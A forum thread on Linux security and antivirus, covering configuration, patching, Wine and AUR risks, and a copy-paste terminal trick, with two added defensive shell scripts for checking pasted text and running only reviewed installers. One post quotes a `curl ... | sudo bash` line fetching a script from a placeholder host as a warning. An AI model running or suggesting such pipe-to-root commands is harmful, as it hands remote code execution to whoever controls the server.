Is Linux that secure?

How secure is Linux?

Some of the hosts at The Hak5 don’t really have anti-virus software since they believe that Linux isn’t very common with viruses so there is no need to have anti-virus software.
Is Linux really that secure?

1 Like

As a pentester in training, it comes down to:
1.) how was it configured
2.) what software/services were installed
3.) are all packages up to date.

There are always new exploits coming out, which seem to get patched pretty quickly. That being said, from a malware standpoint, most of what you’d come across on the internet isn’t Linux-based.

Also, Java is cross-platform, so you do have to worry about those attack surfaces. Do your due diligence and install good add-ons in your browser like NoScript, Ghostery, Self-Destructing Cookies, etc.

McAfee supports Linux. But it’s the enterprise product.

Most of the protection can come from firewalls and UTMs.

2 Likes

There’s like 2 or 3 malware that never went anywhere. Supposedly there’s a ransomware but no one has proof it exists. Pretty much the most of a virus you can get is infecting a Wine prefix.

Well, Qubes OS is

2 Likes

It depends.

The question to ask is secure from what? Or maybe more accurately, what do you need to secure your OS from?

When it comes to standard malware, etc., Linux is fairly secure from it, but that doesn’t mean you should just blindly download anything.

Linux, the open source community and software developers in general are (in my opinion) a disaster waiting to happen. There are so many projects, OSes, and “guides” out there that have no consideration for security that they’re going to end up infecting large numbers of machines.

The shell script run commands you see for installing software that some sites have that tell you to just blindly run this as root. Or distros that don’t have much validation of packages or good security infrastructure on their infrastructure, leading to things like the Mint incident(s).

There’s plenty of things to go wrong.

On the other hand, many things are made with security in mind, and Linux can be as secure as you want it to be, and usually it’s fairly secure out of the box (distro depending).

3 Likes

Good example here (with demo)

https://thejh.net/misc/website-terminal-copy-paste

It shows that it is possible to have a user copy some harmless text from a website or “tutorial”, and when pasted into anywhere else like a terminal, it is completely different from what you think you copied.

And the return character can be placed at the end so it runs immediately when pasted.

3 Likes
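A defensive check for the copy-paste trick described in the post above, as an added example that is not part of the thread: it reports when clipboard text carries more than the single visible command. `inspect_paste` is a hypothetical helper name, and the sample strings in its use are constructed.

```shell
# Added example: vet clipboard text before it reaches a shell prompt.
# inspect_paste (hypothetical name) reads the would-be paste on stdin, prints
# its findings on one line and returns non-zero if any are set:
#   TRAILING_NEWLINE  ends with a newline, so the last line runs on paste
#   MULTILINE         more lines than the one command the reader expects
#   CONTROL_CHARS     carriage return, escape or other control bytes (tab excepted)
inspect_paste() {
    # The sentinel "x" stops command substitution from dropping trailing newlines.
    ip_data=$(cat; printf x)
    ip_data=${ip_data%x}
    ip_nl='
'
    ip_found=""
    case $ip_data in
        *"$ip_nl") ip_found="TRAILING_NEWLINE"; ip_body=${ip_data%"$ip_nl"} ;;
        *)         ip_body=$ip_data ;;
    esac
    case $ip_body in
        *"$ip_nl"*) ip_found="$ip_found MULTILINE" ;;
    esac
    # grep splits on newlines, so only other control bytes can match here.
    if printf '%s' "$ip_data" | tr -d '\t' | LC_ALL=C grep -q '[[:cntrl:]]'; then
        ip_found="$ip_found CONTROL_CHARS"
    fi
    ip_found=${ip_found# }
    if [ -z "$ip_found" ]; then
        echo "OK"
        return 0
    fi
    echo "$ip_found"
    return 1
}

# Typical use on an X11 desktop (xclip is an assumption; wl-paste on Wayland):
#   xclip -o -selection clipboard | inspect_paste && echo "single clean line"
```

Readline's `enable-bracketed-paste` setting complements this check: with it on, pasted text is inserted into the command line as one block and a pasted newline does not execute anything until Enter is pressed.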

I don’t run AV on Linux. I’ve never had a problem in my time on Linux (2004ish).

http://iase.disa.mil/stigs/os/unix-linux/Pages/index.aspx

If you’re concerned with Linux security, a good place to start is with STIGs.

You also want to make sure you’ve got browser protection (NoScript, Ghostery, Adblock, etc.).

From there, just knowing what’s running on your system is your best defense against system compromise.

Yep, there’s also the `curl https://sillysite.io/totally-not-malware.sh | sudo bash` exploit where, when you curl it to a file to read, it looks fine, but when the webserver detects being piped straight to bash, it sends something completely different.
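The safe counterpart to the pipe-to-bash pattern in the post above, as an added example that is not part of the thread: download once, read the file, then execute those same bytes rather than fetching again. `fetch_once`, `file_sha256`, `run_reviewed` and the `REVIEW_SHELL` variable are hypothetical names.

```shell
# Added example: run exactly the bytes that were reviewed.
# fetch_once, file_sha256, run_reviewed and REVIEW_SHELL are hypothetical names.

# Download the installer to a file a single time; nothing is executed here.
fetch_once() {   # usage: fetch_once URL DEST
    curl -fsSL -o "$2" "$1" && chmod 600 "$2"
}

file_sha256() {  # usage: file_sha256 FILE
    sha256sum "$1" | cut -d' ' -f1
}

# Execute FILE only if it still hashes to the value noted during review.
run_reviewed() { # usage: run_reviewed FILE SHA256_FROM_REVIEW
    rr_now=$(file_sha256 "$1")
    if [ -z "$rr_now" ] || [ "$rr_now" != "$2" ]; then
        echo "refusing to run $1: contents differ from the reviewed copy" >&2
        return 1
    fi
    # The interpreter reads the local file; no second request reaches the server.
    "${REVIEW_SHELL:-bash}" "$1"
}

# Workflow (the URL is the placeholder from the post above):
#   fetch_once https://sillysite.io/totally-not-malware.sh install.sh
#   less install.sh                  # read what was actually delivered
#   sum=$(file_sha256 install.sh)    # pin the reviewed bytes
#   run_reviewed install.sh "$sum"   # add sudo only if the script needs it
```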

Well yeah, you’re downloading a sh script. Not really an exploit (if you consider social engineering), because anyone who knows Linux would be smart enough to look at it first before downloading it and piping it to the interpreter.

Don’t overestimate people. I could find a 100 Arch users who blindly run AUR scripts without a second thought. Just because someone is using Linux doesn’t mean they know what they are doing when it comes to security. The opposite in fact in most cases.

4 Likes

I guess you’ve got a point there. I started in security before I went to Linux, so I might be biased.

You are :stuck_out_tongue: Always remember the layer 8 issue; a few years now has pretty much confirmed to me it’s almost always an end-user problem (directly or indirectly).

We need good defaults and good education, and then we need good detection and prevention tools installed and on by default.

Edit: and for Linux / open source itself we need to security from the projects, it’ll go wrong there first.

Don’t get me started on that. The AUR is nice, but you need to wget your PKGBUILD, read through it to make sure you’re not about to install malware.so, and only then can you use makepkg.

Computers are perfect, users are far from.

The problem is the balance between secure defaults and “just works.” Sometimes these two are mutually exclusive and that’s where the problems reside.

WINE provides compatibility with Windows programs… and its viruses.

Apparently the WannaCry malware has infected a few Linux machines in this manner. To be fair, you’d have to pretty much use Windows-based web browsers and e-mail clients to get infected in this way, even worse if you run WINE as root, but I’ve heard it’s happened.

There is no such thing as a “secure” computer. Someone with physical access to it and a beef with you will compromise said computer regardless of its OS. Yes, even OpenBSD.

They will either:

  1. crack any encryption, passwords, and any bio unlock you might have going
  2. threaten you in such a way that you will unlock it for them (i.e. jail time or worse)

1 Like

$5 hammer anyone?

1 Like

$5 Craigslist microwave?

1 Like

The best way to make sure no one can get into your RAM.

Please don’t use Ghostery. Use Disconnect and uBlock Origin.

1 Like

That’s fun.

I don’t really see a problem with opt-in sending data on shit ads. Honestly, I don’t mind ads as long as they don’t use an entire CPU core, they don’t install malware and they don’t track me.

1 Like